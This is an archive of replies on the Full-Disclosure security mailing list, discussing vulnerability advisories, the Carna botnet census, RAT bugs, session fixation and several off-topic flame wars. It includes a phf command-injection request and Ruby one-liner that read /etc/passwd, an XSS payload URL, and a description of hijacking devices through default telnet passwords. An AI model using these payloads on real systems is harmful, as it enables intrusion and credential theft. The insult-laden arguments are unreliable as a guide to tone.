Re: [Full-disclosure] Happy Holidays / Xmas Advisory
And it just so kindly tells you where everything is located, just in case you wanted to know. Ex: http://demo.fatfreecrm.com/passwords/

I half expected to find password hashes, but oh well, that's life. It is a great hack-me application when you can find random vulns simply by dicking around on your phone.

On Dec 26, 2013 3:56 AM, PsychoBilly zpamh...@gmail.com wrote:

> [[ Henri Salo ]] @ [[ 24/12/2013 18:33 ]]--
>
> > On Tue, Dec 24, 2013 at 11:26:15AM +0100, joernchen wrote:
> > > A rather informal advisory on Fat Free CRM (http://fatfreecrm.com/):
> >
> > I created https://github.com/fatfreecrm/fat_free_crm/issues/300 for tracking.
> >
> > ---
> > Henri Salo
>
> I really like the full user db listing feature:
> view-source:http://demo.fatfreecrm.com/login

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Abusing Windows 7 Recovery Process
Since when was full disk encryption standard in Windows 7, let alone Windows environments in general? Sure, there are probably some, but nonetheless...

On Jul 13, 2013 6:47 PM, Alex f...@daloo.de wrote:

> You didn't tell us how you cracked the full disc encryption. (There are ways around controls, but that is why we have multiple security layers.)
>
> On 13 July 2013 22:49:11, valdis.kletni...@vt.edu wrote:
>
> > On Sat, 13 Jul 2013 22:13:38 +0300, Moshe Israel said:
> > > All secured/regulated systems as required by most certifications/standards/best practices.
> >
> > You're new in the industry, aren't you? :)
> >
> > The point you're missing is that the vast majority of computers aren't covered by said certifications and standards. And most of the certifications are merely a money grab by the auditors - the last numbers I found, something like 98% of breaches of systems that were covered by PCI were of systems that at the time of the breach were PCI-compliant. In other words, being PCI compliant didn't actually slow the attackers down one bit.
> >
> > You social engineer your way into the 5th office building you pass, pick a random PC on the 4th floor - I'll bet you that PC is probably *not* running sufficient monitoring to detect an intruder rebooting it and messing with the system.
Re: [Full-disclosure] Abusing Windows 7 Recovery Process
I am aware of this. However, it is not the default and far from standard. Just saying encrypted disks are the exception and not the norm.

On Jul 13, 2013 10:31 PM, Dennis E. Hamilton dennis.hamil...@acm.org wrote:

> BitLocker full disk encryption has been available since Windows Vista. It was improved in Windows 7 and apparently even more for Windows 8. Not all hardware supported it originally. Recent Windows desktops and especially laptops should.
>
> - Dennis
>
> From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gage Bystrom
> Sent: Saturday, July 13, 2013 03:58 PM
> To: Alex; full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Abusing Windows 7 Recovery Process
>
> > Since when was full disk encryption standard in Windows 7, let alone Windows environments in general? Sure, there are probably some, but nonetheless
> >
> > [ … ]
Re: [Full-disclosure] Fw: Fw: Fw: Justice for Molly(copskillingcivillians)
On his behalf: no problem.

On Mar 30, 2013 6:31 PM, Jerry dePriest jerr...@mc.net wrote:

> you sir, are the definition of cad. thanks for keeping it going...
>
> - Original Message -
> From: Michael T mt2410...@gmail.com
> To: full-disclosure@lists.grok.org.uk
> Sent: Saturday, March 30, 2013 1:34 PM
> Subject: Re: [Full-disclosure] Fw: Fw: Fw: Justice for Molly(copskillingcivillians)
>
> > Good lord, stop feeding the troll.
> >
> > Mike
> >
> > On Sat, Mar 30, 2013 at 5:06 AM, Philip Whitehouse phi...@whiuk.com wrote:
> >
> > > So, wait, you're arguing against full disclosure of the critical vulnerabilities in your comments, on a list designed to allow full disclosure?
> > >
> > > Regards,
> > > Philip Whitehouse
> > >
> > > On 29 Mar 2013, at 15:54, Jerry dePriest jerr...@mc.net wrote:
> > >
> > > > for 1 he posted it to the list instead of emailing me direct, Mr nosey pants. I see nothing has changed on this list except the level of integrity...
> > > >
> > > > - Original Message -
> > > > From: Gage Bystrom themadichi...@gmail.com
> > > > To: full-disclosure@lists.grok.org.uk
> > > > Sent: Friday, March 29, 2013 10:51 AM
> > > > Subject: Re: [Full-disclosure] Fw: Fw: Fw: Justice for Molly (copskillingcivillians)
> > > >
> > > > > If you don't tell people what to post or not post, why are you telling them to not post how they disagree with you on if this story should be posted to FD? Hum dee dum dum
> > > > >
> > > > > On Mar 29, 2013 5:28 AM, Jerry dePriest jerr...@mc.net wrote:
> > > > >
> > > > > > 90% of the posts on here are illegal in some form or fashion. It's not a personal attack, it's full disclosure on how one can track info using http://archive.org/index.php - no one looked at that aspect.
> > > > > >
> > > > > > To Johnny law dog: The software maker can override what you listed with their own disclaimer so that's bullshit. Ask Kevin Mitnick...
> > > > > >
> > > > > > Don't tell me what to post, I don't tell you what to post or what not to post... thanks for keeping this thread alive. You could have just stfu, but no. I said sorry and dropped it, you're the ones keeping it going, THANKS!
> > > > > >
> > > > > > 'ssoles
> > > > > >
> > > > > > - Original Message -
> > > > > > From: Jeffrey Walton noloa...@gmail.com
> > > > > > To: Jerry dePriest jerr...@mc.net
> > > > > > Cc: Full Disclosure List full-disclosure@lists.grok.org.uk
> > > > > > Sent: Friday, March 29, 2013 7:10 AM
> > > > > > Subject: Re: [Full-disclosure] Fw: Fw: Justice for Molly (cops killingcivillians)
> > > > > >
> > > > > > > > Go do illegal activities such as reverse engineering
> > > > > > >
> > > > > > > The DMCA (PUBLIC LAW 105–304) has exceptions for reverse engineering and security testing and evaluation. The RE exemption is in Section 1205 (f) REVERSE ENGINEERING. The STE exemption is in Section 1205 (i) SECURITY TESTING.
> > > > > > >
> > > > > > > Jeff
> > > > > > >
> > > > > > > On Fri, Mar 29, 2013 at 8:00 AM, Jerry dePriest jerr...@mc.net wrote:
> > > > > > >
> > > > > > > > who made you the boss of FD? I've seen similar posts and bullshit like April fools jokes posing as 0-day and such. if you don't like it, move along. Go do illegal activities such as reverse engineering for 0-day exploits or holes in facebook so you can scare the rubes. man, try to do something good and I get blasted...
> > > > > > > >
> > > > > > > > Bryan, there is a short bridge waiting for you to take a long walk... By the looks of your myspace page you're anti social and a troll... Well, you got me. I forgot New Zealand is just another offshoot of the penal colony Australia used to be. You can't help it, it's in your genes...
> > > > > > > >
> > > > > > > > Spamming? UCE my mailings were not. They were informative, like this list is supposed to be. You liken my postings to the likes of Netdev and other assholes who truly UCE'd this list to death. btw this is the PERFECT place for this type of discussion. Who made you the fucking moderator of fd? You do a horrible job... I have been on this list since 2005... My postings are gold compared to the viri and other 'sploits people try to con people into.
> > > > > > > >
> > > > > > > > 1. Let's discuss how his facebook account was hacked along with others so no forensics are available. (Feds, gotta love em)
> > > > > > > > 2. Let's discuss how her facebook account was hacked to say she took a bunch of pills THEN shot herself.
> > > > > > > > 3. Let's discuss what a douchebag you are for downplaying something by putting it into the scope of a chain letter? That's confirmation you are in fact a true douchebag...
> > > > > > > >
> > > > > > > > FOAD Antisocial troll... Go remove your myspace page and maybe you won't look like such an ass, whole.
Re: [Full-disclosure] Fw: Fw: Fw: Justice for Molly (cops killingcivillians)
If you don't tell people what to post or not post, why are you telling them to not post how they disagree with you on if this story should be posted to FD? Hum dee dum dum

On Mar 29, 2013 5:28 AM, Jerry dePriest jerr...@mc.net wrote:

> 90% of the posts on here are illegal in some form or fashion. It's not a personal attack, it's full disclosure on how one can track info using http://archive.org/index.php - no one looked at that aspect.
>
> To Johnny law dog: The software maker can override what you listed with their own disclaimer so that's bullshit. Ask Kevin Mitnick...
>
> Don't tell me what to post, I don't tell you what to post or what not to post... thanks for keeping this thread alive. You could have just stfu, but no. I said sorry and dropped it, you're the ones keeping it going, THANKS!
>
> 'ssoles
>
> - Original Message -
> From: Jeffrey Walton noloa...@gmail.com
> To: Jerry dePriest jerr...@mc.net
> Cc: Full Disclosure List full-disclosure@lists.grok.org.uk
> Sent: Friday, March 29, 2013 7:10 AM
> Subject: Re: [Full-disclosure] Fw: Fw: Justice for Molly (cops killingcivillians)
>
> > > Go do illegal activities such as reverse engineering
> >
> > The DMCA (PUBLIC LAW 105–304) has exceptions for reverse engineering and security testing and evaluation. The RE exemption is in Section 1205 (f) REVERSE ENGINEERING. The STE exemption is in Section 1205 (i) SECURITY TESTING.
> >
> > Jeff
> >
> > On Fri, Mar 29, 2013 at 8:00 AM, Jerry dePriest jerr...@mc.net wrote:
> >
> > > who made you the boss of FD? I've seen similar posts and bullshit like April fools jokes posing as 0-day and such. if you don't like it, move along. Go do illegal activities such as reverse engineering for 0-day exploits or holes in facebook so you can scare the rubes. man, try to do something good and I get blasted...
> > >
> > > Bryan, there is a short bridge waiting for you to take a long walk... By the looks of your myspace page you're anti social and a troll... Well, you got me. I forgot New Zealand is just another offshoot of the penal colony Australia used to be. You can't help it, it's in your genes...
> > >
> > > Spamming? UCE my mailings were not. They were informative, like this list is supposed to be. You liken my postings to the likes of Netdev and other assholes who truly UCE'd this list to death. btw this is the PERFECT place for this type of discussion. Who made you the fucking moderator of fd? You do a horrible job... I have been on this list since 2005... My postings are gold compared to the viri and other 'sploits people try to con people into.
> > >
> > > 1. Let's discuss how his facebook account was hacked along with others so no forensics are available. (Feds, gotta love em)
> > > 2. Let's discuss how her facebook account was hacked to say she took a bunch of pills THEN shot herself.
> > > 3. Let's discuss what a douchebag you are for downplaying something by putting it into the scope of a chain letter? That's confirmation you are in fact a true douchebag...
> > >
> > > FOAD Antisocial troll... Go remove your myspace page and maybe you won't look like such an ass, whole.
Re: [Full-disclosure] Fw: petition to remove Aaron Swartz prosecutor
Keep in mind the largest part of the backlash against you is your constant over-the-top, borderline comical reaction to people criticising you. You keep freaking out more and more and yelling at random people; it's quite amusing.

On Mar 29, 2013 8:20 AM, Jerry dePriest jerr...@mc.net wrote:

> I read the TOU and my topic is not political. It has to do with evidence and forensics. Sorry you persons being obtuse couldn't pick up on this and just let it be. Better yet, why not offer info on how to gather info from archive sites that may be of use to everyone? No, you go out of your way to say I'm wrong, my post is wrong, etc. In this age of technology not one person asked about what type of evidence could be gleaned and ways to do it. I have been offline for health reasons and come back to see fd is going shit... It's like when Markus Ranum sold Blackice. A good product turned to crap by lusers...
>
> - Original Message -
> From: Steve Wray stevedw...@gmail.com
> To: Full Disclosure List full-disclosure@lists.grok.org.uk
> Sent: Friday, March 29, 2013 9:48 AM
> Subject: Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
>
> > I'm not a moderator (OBVIOUSLY) but I'll just leave this here, from the list charter:
> >
> > quote
> >
> > Acceptable Content
> >
> > Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information.
> >
> > Gratuitous advertisement, product placement, or self-promotion is forbidden.
> >
> > Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible.
> >
> > Humour is acceptable in moderation, providing it is inoffensive.
> >
> > Politics should be avoided at all costs.
> >
> > /quote
> >
> > I'm thinking mainly "Self promotion" and "POLITICS... avoided... all costs". Enough said?
> >
> > On 29 March 2013 21:34, Jeffrey Walton noloa...@gmail.com wrote:
> >
> > > On Fri, Mar 29, 2013 at 9:05 AM, Jerry dePriest jerr...@mc.net wrote:
> > > > and this is pertinent to the list? another asshole that posts to the list with bullshit (in my eyes) then you go off on me for what I think is important.
> > >
> > > It appears you did not have your bowl of Cheerios this morning.
> > >
> > > Who was the young lady? Perhaps a close friend or relative?
> > >
> > > Jeff
> > >
> > > > - Original Message -
> > > > From: Gary Baribault
> > > > To: full-disclosure@lists.grok.org.uk
> > > > Sent: Monday, January 14, 2013 3:46 PM
> > > > Subject: Re: [Full-disclosure] petition to remove Aaron Swartz prosecutor
> > > >
> > > > > I didn't know the gentleman, but have known some depressive people. There may have been other problems bothering him in his life, but spending a fortune on a lawyer to try and avoid 30 - 50 years in prison and the reputation that he would have if he ever got out is probably quite near the top of the list of things setting his mind frame and causing this unfortunate decision. The powers that be have blood on their hands and hopefully are having rather poor nights' sleep these days. Personally I would be having trouble looking in the mirror for my daily shave.
> > > > >
> > > > > Gary Baribault
> > > > >
> > > > > On 01/14/2013 03:35 PM, valdis.kletni...@vt.edu wrote:
> > > > >
> > > > > > On Mon, 14 Jan 2013 11:02:26 -0500, Jeffrey Walton said:
> > > > > > > On Mon, Jan 14, 2013 at 10:34 AM, richa...@fastmail.fm wrote:
> > > > > > > > https://petitions.whitehouse.gov/petition/remove-united-states-district-attorney-carmen-ortiz-office-overreach-case-aaron-swartz/RQNrG1Ck
> > > > > > > >
> > > > > > > > Above link to remove this prosecutor needs to have signatures by February 11.
> > > > > > >
> > > > > > > It's unfortunate Swartz committed suicide over the incident.
> > > > > >
> > > > > > From the fine article: "On his blog, Swartz had written of his history of depression."
> > > > > >
> > > > > > Given that, and the fact that the article doesn't mention a suicide note stating Aaron's reasons, it's not entirely clear that he in fact committed suicide over the incident. It may have been one factor out of many.
Re: [Full-disclosure] Fw: Fw: Fw: Justice for Molly (copskillingcivillians)
Personal habit when it comes to posting on lists; that has nothing to do with integrity.

On Mar 29, 2013 8:55 AM, Jerry dePriest jerr...@mc.net wrote:

> for 1 he posted it to the list instead of emailing me direct, Mr nosey pants. I see nothing has changed on this list except the level of integrity...
>
> - Original Message -
> From: Gage Bystrom themadichi...@gmail.com
> To: full-disclosure@lists.grok.org.uk
> Sent: Friday, March 29, 2013 10:51 AM
> Subject: Re: [Full-disclosure] Fw: Fw: Fw: Justice for Molly (copskillingcivillians)
>
> > If you don't tell people what to post or not post, why are you telling them to not post how they disagree with you on if this story should be posted to FD? Hum dee dum dum
> >
> > On Mar 29, 2013 5:28 AM, Jerry dePriest jerr...@mc.net wrote:
> >
> > > 90% of the posts on here are illegal in some form or fashion. It's not a personal attack, it's full disclosure on how one can track info using http://archive.org/index.php - no one looked at that aspect.
> > >
> > > To Johnny law dog: The software maker can override what you listed with their own disclaimer so that's bullshit. Ask Kevin Mitnick...
> > >
> > > Don't tell me what to post, I don't tell you what to post or what not to post... thanks for keeping this thread alive. You could have just stfu, but no. I said sorry and dropped it, you're the ones keeping it going, THANKS!
> > >
> > > 'ssoles
> > >
> > > - Original Message -
> > > From: Jeffrey Walton noloa...@gmail.com
> > > To: Jerry dePriest jerr...@mc.net
> > > Cc: Full Disclosure List full-disclosure@lists.grok.org.uk
> > > Sent: Friday, March 29, 2013 7:10 AM
> > > Subject: Re: [Full-disclosure] Fw: Fw: Justice for Molly (cops killingcivillians)
> > >
> > > > > Go do illegal activities such as reverse engineering
> > > >
> > > > The DMCA (PUBLIC LAW 105–304) has exceptions for reverse engineering and security testing and evaluation. The RE exemption is in Section 1205 (f) REVERSE ENGINEERING. The STE exemption is in Section 1205 (i) SECURITY TESTING.
> > > >
> > > > Jeff
> > > >
> > > > On Fri, Mar 29, 2013 at 8:00 AM, Jerry dePriest jerr...@mc.net wrote:
> > > >
> > > > > who made you the boss of FD? I've seen similar posts and bullshit like April fools jokes posing as 0-day and such. if you don't like it, move along. Go do illegal activities such as reverse engineering for 0-day exploits or holes in facebook so you can scare the rubes. man, try to do something good and I get blasted...
> > > > >
> > > > > Bryan, there is a short bridge waiting for you to take a long walk... By the looks of your myspace page you're anti social and a troll... Well, you got me. I forgot New Zealand is just another offshoot of the penal colony Australia used to be. You can't help it, it's in your genes...
> > > > >
> > > > > Spamming? UCE my mailings were not. They were informative, like this list is supposed to be. You liken my postings to the likes of Netdev and other assholes who truly UCE'd this list to death. btw this is the PERFECT place for this type of discussion. Who made you the fucking moderator of fd? You do a horrible job... I have been on this list since 2005... My postings are gold compared to the viri and other 'sploits people try to con people into.
> > > > >
> > > > > 1. Let's discuss how his facebook account was hacked along with others so no forensics are available. (Feds, gotta love em)
> > > > > 2. Let's discuss how her facebook account was hacked to say she took a bunch of pills THEN shot herself.
> > > > > 3. Let's discuss what a douchebag you are for downplaying something by putting it into the scope of a chain letter? That's confirmation you are in fact a true douchebag...
> > > > >
> > > > > FOAD Antisocial troll... Go remove your myspace page and maybe you won't look like such an ass, whole.
Re: [Full-disclosure] Port scanning /0 using insecure embedded devices
I think it's simply a case of everyone more or less knew this was possible and quite easy to pull off; just no one publicly bothered to get around to doing it till now. After all, it's just a large mass of low-hanging fruit compromised to gather data. I'm more impressed by how they aggregated said data together without leaving a nasty trail. Of course I'm giving them the benefit of the doubt that they covered their tracks reasonably or have some sort of means to not worry about law enforcement.

On Mar 26, 2013 8:23 PM, Stefan Jon Silverman s...@sjsinc.com wrote:

> Was really surprised that outside of Valdis's comment on feeding the BlackHats this provoked no further discussion... w/in a few minutes of it arriving I had fired off a forward to several colleagues w/ the comment that it should provoke an interesting discussion here on the sheer number of compromised devices to accomplish his goal... dead air... oh well, sometimes sh*t happens and sometimes it doesn't...
>
> Until this ended up in an eNewsRag in my inbox today (good read):
>
> The Dark Side of the Internet of Things -- http://www.networkcomputing.com/next-generation-data-center/servers/the-dark-side-of-the-internet-of-things/240151608
>
> Regards,
> Stefan
>
> Stefan Jon Silverman
> Founder / President
> SJS Associates, N.A., Inc.
> A Technology Strategy Consultancy
> Cell: 917 929 1668
> eMail: s...@sjsinc.com
> Web: http://www.sjsinc.com
> Aim/Skype/GoogleIM: LazloInSF
> Twitter/Yahoo: sjs_sf
> "Weebles wobble but they don't fall down"
>
> On 3/17/2013 4:54 PM, internet census wrote:
>
> > - Internet Census 2012 -
> > Port scanning /0 using insecure embedded devices
> > - Carna Botnet -
> >
> > While playing around with the Nmap Scripting Engine we discovered an amazing number of open embedded devices on the Internet. Many of them are based on Linux and allow login to standard BusyBox with empty or default credentials.
> >
> > From March to December 2012 we used ~420 Thousand insecure embedded devices as a distributed port scanner to scan all IPv4 addresses. These scans include service probes for the most common ports, ICMP ping, reverse DNS and SYN scans. We analyzed some of the data to get an estimation of the IP address usage.
> >
> > All data gathered during our research is released into the public domain for further study. The full 9 TB dataset has been compressed to 565GB using ZPAQ and is available via BitTorrent.
> >
> > The dataset contains:
> > - 52 billion ICMP ping probes
> > - 10.5 billion reverse DNS records
> > - 180 billion service probe records
> > - 2.8 billion SYN scan records for 660 million IPs with 71 billion ports tested
> > - 80 million TCP/IP fingerprints
> > - 75 million IP ID sequence records
> > - 68 million traceroute records
> >
> > This project is, to our knowledge, the largest and most comprehensive IPv4 census ever. With a growing number of IPv6 hosts on the Internet, 2012 may have been the last time a census like this was possible.
> >
> > A full documentation, including statistics and images, can be found on the project page.
> >
> > We hope other researchers will find the data we have collected useful and that this publication will help raise some awareness that, while everybody is talking about high class exploits and cyberwar, four simple stupid default telnet passwords can give you access to hundreds of thousands of consumer as well as tens of thousands of industrial devices all over the world.
> >
> > No devices were harmed during this experiment and our botnet has now ceased its activity.
> >
> > Project Page:
> > http://internetcensus2012.bitbucket.org/
> > http://internetcensus2012.github.com/InternetCensus2012/
> > http://census2012.sourceforge.net/
> >
> > Torrent MAGNET LINK:
> > magnet:?xt=urn:btih:7e138693170629fa7835d52798be18ab2fb847fe&dn=InternetCensus2012&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.ccc.de%3a80%2fannounce&tr=udp%3a%2f%2ftracker.publicbt.com%3a80%2fannounce
Re: [Full-disclosure] The World's Largest Hacker Database
I agree. I'll admit that it's pretty interesting, but I highly doubt that it even remotely compares with FBI databases and similar organizations. After all, it's little secret that they keep their eyes on certain communities, and ergo it makes sense that they will take the time to build up information on individuals only well known in their own neck of the woods but not the rest of the internet at large. Especially with the liberty taken with the definition of hacker, so many unlisted people running large open source projects could easily count.

I also find it amusing that often their fact section directly goes against the summary of the person, and the lack of details is annoying. For such impressive claims I would have thought that the entries would be more similar to a dox, containing all the important public knowledge on a nick. Still, for a public database it's pretty interesting and served what I think is its real purpose: to draw in visitors.

On Jan 8, 2013 8:00 AM, Justin C. Klein Keane jus...@madirish.net wrote:

> I'm pretty sure that the FBI has details on a few more than the 700 records in this database. Good job finding college professor Matt Blaze, but you couldn't find Hack in the Box founder l33tdawg?!? I'm sure I could find a few more hackers that were overlooked.
>
> Justin C. Klein Keane
> a.k.a. Mad Irish
> http://www.MadIrish.net
>
> The PGP signature on this email can be verified using the public key at http://www.madirish.net/gpgkey
>
> On 01/07/2013 10:36 AM, scryptz0 SOLDIERX wrote:
>
> > Infosec Institute made a write up on the largest public hacker database on the net that is rumored to be rivaled by the FBI. Check it out at http://resources.infosecinstitute.com/worlds-largest-public-hacker-database/
> >
> > The SOLDIERX HDB is the world’s largest public hacker database on the net and is rumored to be rivaled only by the FBI’s hacker database. Their hacker database contains a list of programmers, developers, black hats, white hats, security researchers, fake ethical hackers, hacktivists, packet kiddies, click kiddies, script kiddies, security professionals, heroes of computer revolution (Hello Steven Levy), hardware hackers, ch1xors (oh yes! although some people believe that they are non-existent), game hackers, and those who have embraced and embodied the hacker culture.
Re: [Full-disclosure] Competitively priced drop box for pentesters
Intern: Why is there an ethernet jack for that power strip?
Mentoring Admin: Why, I have no clue, I didn't put it there. Replace it and check it out.
Intern: Google says it's from some Demyo company for pen testers.
Admin: Hardly covert, the consulting pen test team we hired this year must suck dick.
Intern: So much dick.

On Fri, Dec 21, 2012 at 10:59 AM, Almaz al...@demyo.com wrote:

> https://twitter.com/demyosec/status/282194259820548096
>
> --
> Almantas Kakareka, CISSP, GSNA, GSEC, CEH
> CTO Demyo, Inc.
> Miami, FL, USA
> Cell: +1 201 665
> Desk: +1 786 203 3948
> Email: al...@demyo.com
> Twitter: @DemyoSec
> Web: www.demyo.com
Re: [Full-disclosure] Multiple 0-days in Dark Comet RAT
That's because no one particularly cares that it is malware. Botnets, rootkits, RATs, etc. are all just as potentially vulnerable as any other software, except the impact is pretty low. Let's say someone was exploiting this in the wild. Realistically, what are they accomplishing? Most of the time they'd just be jacking boxes from other people that already got in. Hardly a feat when chances are you could get in through the same methods the original guy did.

On Oct 11, 2012 7:08 AM, valdis.kletni...@vt.edu wrote:

> On Wed, 10 Oct 2012 23:25:50 +0200, Pascal Ernster said:
> > I suppose it turns into a 0 day when you post it on this mailing list and happen to be in the mood to put the vendor's marketing division on BCC. -1 day could be when you ask a friend to check your mail to this ML for major grammar errors before you post it.
>
> All this ranting about the meaning of a 0-day - and not one person has mentioned the fact that the vulnerability is in *malware*??!?
Re: [Full-disclosure] Council financial data at risk from internet hackers
tl;dr: A security audit found security holes, and a year later not all of the holes were fixed.

On Sep 26, 2012 3:15 AM, Bit WAshor b1t.was...@ymail.com wrote:

> SENSITIVE financial data could be at risk after it was revealed that a council’s IT network could be open to outside attacks following an audit of its systems.
>
> The detailed look into IT systems at South Derbyshire District Council has highlighted several issues which could see the authority left open to external attack.
>
> The problem arose as a result of an interim audit report, undertaken by Grant Thornton, which highlighted key risk areas. Specialist vulnerability testing discovered a ‘number of issues which needed to be addressed’ in order to protect council computer systems and sensitive data.
>
> After the problem was highlighted in November 2011, the council set up an action plan. However, despite making progress, some problems such as weak or blank passwords on servers and issues with domain administrator credentials remain.
>
> The report stated: “We acknowledge that the council is working with suppliers to resolve some of the issues.
>
> “Without full resolution of issues raised in relation to external vulnerability testing, management cannot be assured that the council’s IT network and systems are secure from attacks.
>
> “A successful attack could interrupt network services and be used to access sensitive financial data.”
>
> The council stated: “The remaining issues are more complex to resolve and the resolutions could have implications for the relevant business process.”
>
> The authority revealed that the password problem was being addressed but changes could impact the working of software.
>
> A deadline of November has been set for the resolution of the problems, which were deemed a medium priority, meaning ‘action is required to address a significant deficiency’.
>
> The recommendations will be discussed at a meeting of the council’s audit sub committee at the Civic Offices, in Civic Way, Swadlincote, on September 26.
Re: [Full-disclosure] Adobe Flash UpdateInstalls Other Warez without Consent
Uhh I had to update a Windows box just the other day and it didn't install any toolbars or anything like that. Might wanna start running a few scans..

On Sep 6, 2012 10:42 AM, Jeffrey Walton noloa...@gmail.com wrote:

> On Thu, Sep 6, 2012 at 1:26 PM, James Lay j...@slave-tothe-box.net wrote:
>
> > On 2012-09-06 11:09, Jeffrey Walton wrote:
> >
> > > The company that writes the world's most insecure software [1,2,3] has figured out a way to further increase an attack surface. Adobe now includes additional warez in their updates without consent. The warez includes a browser and toolbar. The attached image is what I got when I agreed to update Adobe Flash because of recent security vulnerability fixes. It appears Adobe has become a whore to Google like Mozilla. +1 Adobe.
> > >
> > > [SNIP]
> >
> > Perhaps someone didn't uncheck the checkbox on download
>
> Fortunately, I still had the browser window open (that was opened by the update process): https://get3.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer . No check boxes - only instructions to install.
>
> Jeff
Re: [Full-disclosure] A modest proposal
for. There is no need to prevent reverse engineering. I thought that was clear enough: the point of the variation is that you make the attacker reverse engineer each copy separately. The attacker will get tired.

It’s good to get responses like yours though; that is what I hoped might come out of the post.

Glenn Everhart

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gage Bystrom
Sent: Thursday, July 19, 2012 9:44 PM
To: Glenn and Mary Everhart; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] A modest proposal

> 1.) waste of a reference by no follow through :( shame shame
>
> 2.) The only real problem with that idea is that you'd be doing it wrong. As in what you are doing does not accomplish what you want it to do. Those polymorphic techniques are there to prevent identification, not necessarily to prevent hooking, code injection, and reverse engineering. You use completely different techniques for those.
>
> 3.) It wouldn't be hard to get around it. Just replace a dll or two with the functions you want to intercept and analyze the output. They couldn't care less how polymorphic your code is if it still needs to pass the juicy data to a library function. And in a lot of cases they are already doing this, so it's highly possible that you could suddenly take an application a piece of malware was designed to harvest information from, make it all polymorphic, and the same old malware version could still mess with it. And yes, it would still be able to identify the application cause the end user needs to be able to identify it and the malware would just use whatever method the end user would to spot it for injection or what not.
>
> 4.) I will say, at least you're thinking, even if it's flawed.
>
> On Jul 19, 2012 6:24 PM, Glenn and Mary Everhart everh...@gce.com wrote:
>
> > Hello, FD...
> >
> > A thought occurred to me: Why not use the same kind of polymorphism and software metamorphism that is used by malware writers as a protective measure? If you have a piece of code that you don't want malware to be able to inspect, that might perhaps have some secrets in it or that you want not to be trivial to have some other code patch, why not arrange for that code to be different in form (but the same in function) with every copy? (For places that insist on code that must be signed, you might need to have only perhaps scores or hundreds of variants, and then make it clear that the signed code requirements were making the systems that have them LESS secure than those without. bwahahaha. grin.)
> >
> > There are many ways to achieve this kind of result. Many would result in somewhat larger executables or the like, or possibly larger data, but some of the methods don't even need access to source code. (I would suspect many systems like this will be clearest to those of us who have worked in assembly languages and the like over the years, but that is a bit beside the point.) If every copy of a program is laid out differently, and data gets moved around also from copy to copy, the job of the attacker would seem to get much harder.
> >
> > Glenn Everhart
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
Hello Full Disclosure! I is warn you about musntlive! He is use old joke over over again. Not funny!

-- I actually got nothing against you personally but it's boring when you use the same tactic over and over :/ mix things up and make it interesting!

On Jul 17, 2012 8:24 AM, Григорий Братислава musntl...@gmail.com wrote:

> On Tue, Jul 17, 2012 at 10:11 AM, king cope isowarez.isowarez.isowa...@googlemail.com wrote:
>
> > Hello Jan,
> >
> > I did some additional tests for the IIS bugs.
> >
> > * IIS 6.0 PHP authentication bypass is only possible on Windows Server 2003 SP1. SP2 seems unaffected. So take that bug as resolved, my mistake as I didn't have a fully patched system online when testing.
>
> kingcope are we is release advisories to patched software? Is so, then I introduce exploit along with you.
>
> Hello full disclosure!! !! !! Is like to warn you about phf vulnerability. Is hackers can get your password list in is unpatched server. PoC on is my system:
>
> 213.24.76.77 - - [17/July/2012:23:17:47 -0700] GET /cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0 500 -
>
> In Ruby (here we is own rsnake):
>
> require 'open-uri'
> open(' http://www.webfringe.org/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0'){ |f| print f.read }
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
/*PoC*/
Sorry no automated code yet :( can verify manually as follows:
Read musntlive's post.
If it is similar to multiple previous posts check if still funny.
Notice how you get a return value of nope.
/EoF

I can haz CVE now :(?

On Jul 17, 2012 10:10 AM, Григорий Братислава musntl...@gmail.com wrote:

> And you can is prove this theory is how?
>
> On Tue, Jul 17, 2012 at 1:09 PM, Gage Bystrom themadichi...@gmail.com wrote:
>
> > Hello Full Disclosure! I is warn you about musntlive! He is use old joke over over again. Not funny!
Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
Ok after playing around and re-reading the advisory I was finally able to get the PoC to work. While it is interesting once you actually see it work I simply do not believe it warrants the severity you have described.

The main reason why I say this is because any attacker in a position to modify a victim's session id is simply in a position to do better things. Why go through the niche roundabout way when you can just simply jack the authenticated session ID? The only conceivable scenario I can think of would be in the case of a stored XSS that isn't present after authentication, in which case stealing the session ID beforehand would be a much better avenue and more in line with what you are trying to warn about (maybe you should make the PoC reflect that to better illustrate your point). Even then we are talking about a really niche attack.

Basically this sounds like a classic example of: Yes, technically this is abusable, but if you are worried about this, you have bigger problems to deal with.

Speaking of XSS your vuln page has one:
http://www.iosec.org/iosec_login_vulnerable.php?user=%3Cscript%3Ealert%28%22Told%20ya%20so%22%29%3C/script%3Efailed=1

not to mention an arbitrary (even non-existent users) account change:
http://www.iosec.org/iosec_login_vulnerable.php?user=admin
((after logging in, not that the result page is much))

Yeah, yeah I know it's meant to be vulnerable to begin with, but you should really make sure a PoC vulnerable page is only vulnerable to what you are trying to demonstrate, otherwise it can be hard to identify if this is a serious issue or just an example of your personal screw ups, generally speaking at least.

On Fri, Jul 13, 2012 at 1:46 AM, Gokhan Muharremoglu gokhan.muharremo...@iosec.org wrote:

> You can find an example page and combined vulnerabilities at the URL below. This example login page is affected by Predefined Post Authentication Session ID Vulnerability.
>
> This vulnerability can lead to a social engineering scenario or other hijacking attack scenarios when mixed with other vulnerabilities (such as XSS).
>
> For proof of concept: http://www.iosec.org/iosec_login_vulnerable.php
>
